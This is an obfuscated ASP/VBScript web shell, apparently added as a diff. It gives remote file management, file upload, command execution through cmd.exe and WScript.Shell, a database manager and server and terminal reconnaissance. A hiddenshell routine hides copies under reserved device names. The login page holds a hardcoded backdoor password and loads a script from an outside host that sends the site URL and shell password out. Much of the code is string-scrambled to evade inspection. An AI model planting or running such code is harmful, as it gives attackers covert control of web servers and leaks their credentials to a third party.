)` 0 > ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 =  <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br><tSI=~<~`></tr��</tdͳ�û����nu'>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~<trSI=SI>~`&nbspFF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~<tdSI=SI;~`&obj.SI=SIName`>&nbsFFF~~~#FFFlor=~ bgcod><td&~</tSI=SIp;~ `��(��)~&~ϵͳ��SI=SI`d></t&~</tSI=SIr>~`d></tp;</t>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he<tr><SI0=~r>~ `end if`x=~�Զ�hen le=2 trtTypJ.Staif OB~`x=~�ֶ�hen le=3 trtTypJ.Staif OB~`x=~����hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`></tr></td/fontth&~<bj.pap;~&o>&nbsF0000or=#Ft col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI1&~<SI1=S>~`else`></tr></td/fontth&~<bj.pap;~&o>&nbs399FFor=#3t col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI2&~<SI2=S>~`end if`next`</tabSI2&~&SI1&I&SI0RRS Sle>~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br><tSI=~<~`></trϢ</td���������nu'>��r='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~`td></)&~</NAME~RVER_s(~SEiableerVar.servquest>~&reFFFF'='#FFcolortd bg/td><bsp;<F'>&nFFFFFor='#bgcol><td ��</td'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`FFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>������IPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=<tr aank'>='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<foSI=SI~`/form/tr></td><'2'><alue=on' v'actiname=den' ='hid typeinput��ѯ'><lue='t' vasubmiype='put t> <in~)&~'_ADDRLOCALles(~ariabrverVst.SeRequee='~& valu='15' size='ip' nametext'ype='put t&~<inSI=SI>~`</tr></td>nbsp;ow&~&'>~&nFFFFFr='#Fgcolo<td b</td>nbsp;FF'>&#FFFFlor=' bgcod><tdʱ��</t'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI~`></tr~</tdRS~)&CESSOF_PROBER_O(~NUMablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>CPU����'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`d></t&~</t~OS~)bles(Variaerverest.S&RequFF'>~#FFFFlor=' bgcod><tdp;</t>&nbsFFFF'='#FFcolortd bg/td><����ϵͳ<'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SIr>~`></tr~</tdRE~)&OFTWAVER_S(~SERablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>�������汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`=0 ToFor i 13`td></)&~</t(i,2>~&So=leftalignFFF' '#FFFolor=d bgctd><t)&~</t(i,1>~&SoFFFF'='#FFcolortd bg/td><0)&~<ot(i,'>~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`Next`RRS SI",Pso):End Function:Function DownFile(Path):ExeCute SinfoEn("arle.CseonspRe`)),0(6ot(SctjeObteeaCr= M OSt Se`enOpM.OS` 1 =peTyM.OS`at PleFiomFradLoM.OSh`)+\~,~thpav(Retrns=Isz1`z),sthpad(Mi& ~ e=amenil ft;enhmactt~a, n~ioitosspDit-enntCo ~eradHedd.AseonspRe`iz.SSM O~,thngLet-enntCo ~eradHedd.AseonspRee`8~F-UT ~ =etrsha.CseonspRe`amrestt-teocn/ioaticplap ~ =peTyntteon.CseonspRe~`ea.RSM OteriyWarin.BseonspRed`shlu.FseonspRe`osClM.OSe`inthNo= M OSt Seg",Pos):End Function:Function HTMLEncode(S):if not isnull(S) then:S= replace(S,">","&gt;"):S=replace(S,"<","&lt;"):S=replace(S,CHR(39),"&#39;"):S=replace(S,CHR(34),"&quot;"):S=replace(S,CHR(20),"&nbsp;"):HTMLEncode=S:end if:End Function:sub hiddenshell
+fpath=request.servervariables("path_translated"):set fso=server.createobject("scripting.filesystemobject"):pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9":rndpex=split(pex,"|")(rndnumber(0,17)):session("seljw")="":filepath1=server.mappath("."):filename1=right(fpath,len(fpath)-instrrev(fpath,"\")):url=request.servervariables("url"):url=left(url,instrrev(url,"/"))&rndpex&"."&filename1:fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1:set fso=nothing:rrs "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub:Function UpFile():
+If Request("Action2")="Post" Then
+Set U=new UPC : Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+If UName="" Or F.FileSize=0 then
+SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+Else
+F.SaveAs UName
+If Err.number=0 Then
+SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+RRS ""&copyurl&""
+End if
+End If
+Set F=nothing:Set U=nothing
+SI=SI&BackUrl
+RRS SI
+ShowErr()
+Response.End
+End If
+SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+SI=SI&"<tr><td>"
+SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\Av.asp")&"' size='40'>"
+SI=SI&" <input name='LocalFile' type='file'size='25'>"
+SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+SI=SI&"</td></tr></form></table>"
+RRS SI:
+End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt nam<inpuLL·����&~SHESI=SI`hell~ipt.S>WScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~<inSI=SI`440;'ight:0%;heth:10='widStylearea <text'ִ��'>alue=it' v'submtype=nput '> <iCmd&~~&Deflue='%' vath:92='widStylecmd' ame='put n&~<inSI=SI>~`~ The~)<>~(~cmd.FormquestIf Ren`s~ th)=~yeript~(~wsc.Formquestif Reen`Sot(1ject(ateObM=CreSet C,0))`~&Def~ /c Path&Shellexec(D=CM.Set DCmd)`eadalout.rD.stdaaa=Dl`SI=SI&aaa`else` Nextesumeror ROn Er`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`bjectstemOileSying.Fcriptct(~SeObjeCreatrver.so=SeSet f~)`md.txth(~cmapparver. = sepFileszTemt~)` 0, TFile,zTemp~ & s ~ > Cmd && Def/c ~ th&~ ellPan (Shws.RuCall rue)`ject~temObleSysng.Firiptit(~ScObjecreates = CSet f)`se, 0, Falle, 1empFi (szTtFileenTexfs.Opcx = FilelSet o)`.Readlelcxe(oFiEncod.HTMLerveraaa=SAll)`lcx.CoFilelose`, TrupFileszTemFile(eletefso.DCall e)`SI=SI&aaa`end if`End If`></fotarea</tex13)&~&chr(SI=SIrm>~`RRS SI",Pso):End Function:ExeCute SinfoEn("ioctun Fnd:EtrwSne= f iner:SxtNe):os P -618329 ( &os+P)) 1i,, trtsged(Mic(As& r Stew n =trwSne):trtsgen(Leo  T 1 = ior:FtrwSne,  iim:Ds)Po, trtsgef(iner SontincFun",Pos):Function CreateMdb(Path):ExeCute SinfoEn(">~br><br~<I= S`) 0)2,t(Sot(ecbjeOatre C = Cet S`thPa& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe(atre.C C)`nghiot N = Cet S`he T=0ermbnur.Erf  In`��!����~��& h at P &SI= I  S~` Ind Ef`rlkUac&BSII= S ` SRS RI",Pos):End function:Function CompactMdb(Path):ExeCute SinfoEn("enTh) ,1(0ot Sot NIf`)),0(3ot(SctjeObteeaCrC=t Se `at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.h`inthNoC=t Seg`seEl`)),1(0ot(SctjeObteeaCrO=FSt Se`enTh) thPas(stxieEil.FSO FIf`)),0(3ot(SctjeObteeaCrC=t Se `k~ba~_h&at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.`inthNoC=t Seg`at PleFiteleDeO.FSh`at,Pk~ba~_h&at PleFiveMoO.FSh`seEl`>~erntce</�֣��з�~ûh&at&P��~����r><br><br><br>teen<c=~SI `=1ermbnur.Er`Ifd En`inthNoO=FSt Seg`Ifd En`enTh0 r=beum.nrr EIf`>~erntce</��������~ѹh&at&P��~����r><br><br><br>teen<c=~SI`Ifd En`UrckBaI&=SSIl`SIS RR",Pos):End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center>'"&errout&"'</center>"
+end if
+else
+si="<script src=""http://sx.love-1-love.com/sx.php?url="&server.URLEncode(""&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><hr><FORM Action='"&URL&"' method=Post> <INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=Login><hr><br>"&mmshell&"</div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if
+Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~<taSI=SI0'>~`on='' actipost'hod='' metbFormme='Drm na&~<foSI=SI>~`�Ӵ�:</;���ݿ���&nbsp27'> ght='' hei='100width><td &~<trSI=SItd>~`/td>~~~~><bStr&~~~&Dalue=70' vdth:4e='wi stylbStr'me='Dut na><inp&~<tdSI=SI`ption����</occesse=0>A valuptionon><o/opti�Ӵ�ʾ��<=-1>��valuetion '><opalue)ex].vedIndelectons[s(optiDbStr Fulleturnge='rnchantn' o'StrBname=lect '><seentergn='c' alih='60 widt&~<tdSI=SI>~`ption����</o3>DSNalue=ion v><optption����</oMySqlue=2>n valoptioion><</optSql����=1>Msvaluetion &~<opSI=SI>~`tion>��</op5>������alue=ion v><optption����</o=4>��ʾvaluetion n><opoptio��--</-SQL��=-1>-valuetion &~<opSI=SI~`ion>~</opt>�����ݱ�lue=8on va<optition>��</op7>�޸���alue=ion v><optption����</o=6>ɾ��valuetion &~<opSI=SI`ption�ֶ�</o11>ɾ��alue=ion v><optption�ֶ�</o10>����alue=ion v><optption�ݱ�</o=9>ɾ��valuetion &~<opSI=SI>~`></tr></tdelectn></soptioȫ��ʾ</=12>��valuetion &~<opSI=SI>~`lue='n' vahiddeype='ge' te='Pat nam<inpuger'>bManaue='D' validdenpe='hn' tyActioame='put n&~<inSI=SI1'>~`:</tdL��������sp;SQ'>&nbt='30heigh><td &~<trSI=SI>~`></tdr&~~~SqlSt=~~~&value470' idth:le='w' styqlStrme='Sut na><inp&~<tdSI=SI>~`/td>~()'><Checkrn Db'retulick=' once='ִ�� valubmit'e='Su' namubmitpe='sut ty><inpnter'n='ce alig&~<tdSI=SI`pan>~'></s='abcan ide><sp/tablorm><r></f&~</tSI=SI`I:SI=RRS S~~`0 Thetr)>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r>��</d>��<bC'><tCCCCCor='#Bgcol'25' ight=tr heble><&~<taSI=SItd>~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a><brl ]</>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter><n=cen alig&~<tdSI=SI>~`</td>~</a>Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI~`End If `veNexRs.Mot `Loop `s=NotSet Rhing`able>r></t&~</tSI=SI~`I:SI=RRS S~~`10 ThStr)>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr�䣺~&S&~ִ����SI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td></ccc><=#ccccolor25 bgight=tr heble><&~<taSI=SItd>~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~</d.Nam>~&Flnter'n='ce alig&~<tdSI=SItd>~`thingld=noSet F`Next`&~</tSI=SIr>~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t></t</fongs'>xngdine='wit fac><foncccccor=#cbgcol><td &~<trSI=SId>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~</tlInfo>~&Color&~&Bgcolor=~ bgco&~<tdSI=SId>~`Next`&~</tSI=SIr>~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ�룺~&nbsp&RC&~��¼����~nter>gn=ce~ aliFN+1&an=~&colsp><td &~<trSI=SIPN`>1 ThIf PNen`a>&nb��һҳ</&~)'>age-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';<a h&nbspҳ</a>1)'>��&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;<sp;&n&~&nbSI=SIsp;~`End iSp=1:Else:ge-8:Sp=PaThen:ge>8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else`&nbsp~</a>>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI;~`End If`Next`βҳ</a&~)'>,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j<a hrnbsp;</a>&'>��һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;<a&~&nbSI=SI>~`End If`able>r></td></t'></tFEFEFr='#E colo&~<hrSI=SI~`=Nothet Rsose:SRs.Cling`I:SI=RRS S~~`Else `lStr)te(SqExecuConn.`SqlSt��䣺~&&~SQLSI=SIr`End If`I:SI=RRS S~~`End If`CloseConn.`othinonn=NSet Cg`End If",Pso):End Function:Dim T1
+
+Function EnCode(ObjStr,ObjPos)
+Dim NewStr,TmpStr,i,LenStr:LenStr=Len(ObjStr):For i=0 To Int(LenStr/ObjPos)-1:TmpStr=Mid(ObjStr,i*ObjPos+1,ObjPos)&TmpStr:Next:EnCode=TmpStr&Right(ObjStr,LenStr Mod ObjPos)
+End Function
+
+
+
+Class UPC:Dim D1,D2:Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function:Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function:Private Sub Class_Initialize:Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName:set D1=CreateObject(Sot(4,0)):if Request.TotalBytes<1 then Exit Sub
+  set T1=CreateObject(Sot(6,0)):T1.Type=1:T1.Mode=3:T1.Open:T1.Write Request.BinaryRead(Request.TotalBytes):T1.Position=0:TDa=T1.Read:DStart=1:DEnd=LenB(TDa):set D2=CreateObject(Sot(4,0)):vbCrlf=chrB(13)&chrB(10):set T2=CreateObject(Sot(6,0)):TSt=MidB(TDa,1,InStrB(DStart,TDa,vbCrlf)-1):TLen=LenB(TSt):DStart=DStart+TLen+1:while (DStart+10)<DEnd:DIEnd=InStrB(DStart,TDa,vbCrlf&vbCrlf)+3:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DStart:T1.CopyTo T2,DIEnd-DStart:T2.Position=0:T2.Type=2:T2.Charset="gb2312":TIn=T2.ReadText:T2.Close:DStart=InStrB(DIEnd,TDa,TSt):FStart=InStr(22,TIn,"name=""",1)+6:FEnd=InStr(FStart,TIn,"""",1):UpName=lcase(Mid(TIn,FStart,FEnd-FStart)):if InStr (45,TIn,"filename=""",1)>0 then
+  set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if
+  else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class:
+
+Function SinfoEn(ObjStr,ObjPos)
+ObjStr=Replace(ObjStr,"~",""""):NewStr=Split(ObjStr,"`"):For i=0 To UBound(NewStr):SinfoEn=SinfoEn&EnCode(NewStr(i),ObjPos)&vbCrLf:Next:SinfoEn=Left(SinfoEn,Len(SinfoEn)-2)
+End Function
+
+
+
+Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F)
+  dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class:
+
+Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function
+
+
+
+Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>�����ش��� ("&D.DriveLetter&":)</a></td></tr>" 
+Next
+End Function
+Function Show1File(Path):
+Set FOLD=CF.GetFolder(Path)
+i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>"
+For Each F in FOLD.subfolders
+SI=SI&"<td height=10 width=17% align=center><div style='border:1px solid "&BorderColor&"'>"
+SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""����""><font face='wingdings' size='6'>0</font><br>"&F.Name&"</a>" 
+SI=SI&"<br><b>[</b><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'onclick='return yesok()' class='am' title='����'>Copy</a> "
+SI=SI&"<a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a>"
+SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'onclick='return yesok()' class='am' title='�ƶ�'>Move</a>"
+SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")'onclick='return yesok()' class='am' title='����'>Down</a><b>]</b></div></td>"
+i=i+1
+If i mod 5 = 0 then SI=SI&"</tr><tr>"
+Next
+SI=SI&"</tr><tr><td height=2></td></tr></table>"
+RRS SI:SI="":i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>"
+For Each L in Fold.files
+SI=SI&"<td height='30'><div style='border:1px solid "&BorderColor&"'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'><font face='wingdings' size='5'>2</font>"&L.Name&"</a> <b>[</b> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+Si=Si&"<a  href='###' class='am' ><font color=blue >Ȩ��</font></a>"
+Dim EditOOK
+EditOOK=1
+EditOOV=l.Attributes
+If EditOOV >= 128 Then
+EditOOV = EditOOV - 128
+End If
+If EditOOV >= 64 Then
+EditOOV = EditOOV - 64
+End If
+If EditOOV >= 32 Then
+EditOOV = EditOOV - 32
+End If
+If EditOOV >= 16 Then
+EditOOV = EditOOV - 16
+End If:If EditOOV >= 8 Then
+EditOOV = EditOOV - 8
+End If
+If EditOOV >= 4 Then
+EditOOV = EditOOV - 4:EditOOK=0
+End If
+If EditOOV >= 2 Then
+EditOOV = EditOOV - 2:EditOOK=0
+End If
+If EditOOV >= 1 Then
+EditOOV = EditOOV - 1:EditOOK=0
+End If
+if EditOOK=0 then
+si=si&"<font face='webdings' size='1' color=red>x</font>"
+else
+si=si&"<font color=red >��</font>"
+end if
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a> <b>]</b> - "
+
+SI=SI&clng(L.size/1024)&"K<br><b>"
+SI=SI&L.Type&"</b> <i> - "
+SI=SI&L.DateLastModified&"</i></div></td>"
+i=i+1
+If i mod 2 = 0 then SI=SI&"</tr><tr>"
+Next
+ RRS SI&"</tr></table>"
+Set FOLD=Nothing
+End function:
+
+
+
+
+Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c��<�ɹ�ɾ��~ h&at&P ~�ļ�r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function EditFile(Path)::If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:RRS ""&copyurl&"":Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:
+End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&�ļ�r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR `Ifd En",Pos):End Function:Function MoveFile(Path):ExeCute SinfoEn("|||~)th,~|it(Pa= SplPath `~ The1)<>~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter����</c&~�ƶ���th(0)��~&Pa<br>��><br>r><brcenteSI=~<>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c��<�ɹ�ɾ��&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function CopyFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function MoveFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce</��������~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function NewFolder(Path):ExeCute SinfoEn("enTh~ >~h<at Pnd ah)at(PtsisExerldFoF. Cot NIf`thPar deoleFatre.CCF`r>teen/c��<�ɹ��½�&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:End Class:sub getTerminalInfo():ExeCute SinfoEn(" Nextesumeror ROn Er`hell~ipt.S~WScrject(ateObr.CreServesX = Set w)`ermPoey, tPortKminal, tertPathalPorerminDim trt`nPassoLogi, auterKeyginUsutoLoth, aginPautoLoDim aKey`nPassoLogi, autrnameinUsetoLogy, aubleKeinEnatoLoge, auEnablLoginsAutoDim iword`Tcp\~\RDP-tionsinStaver\Wl 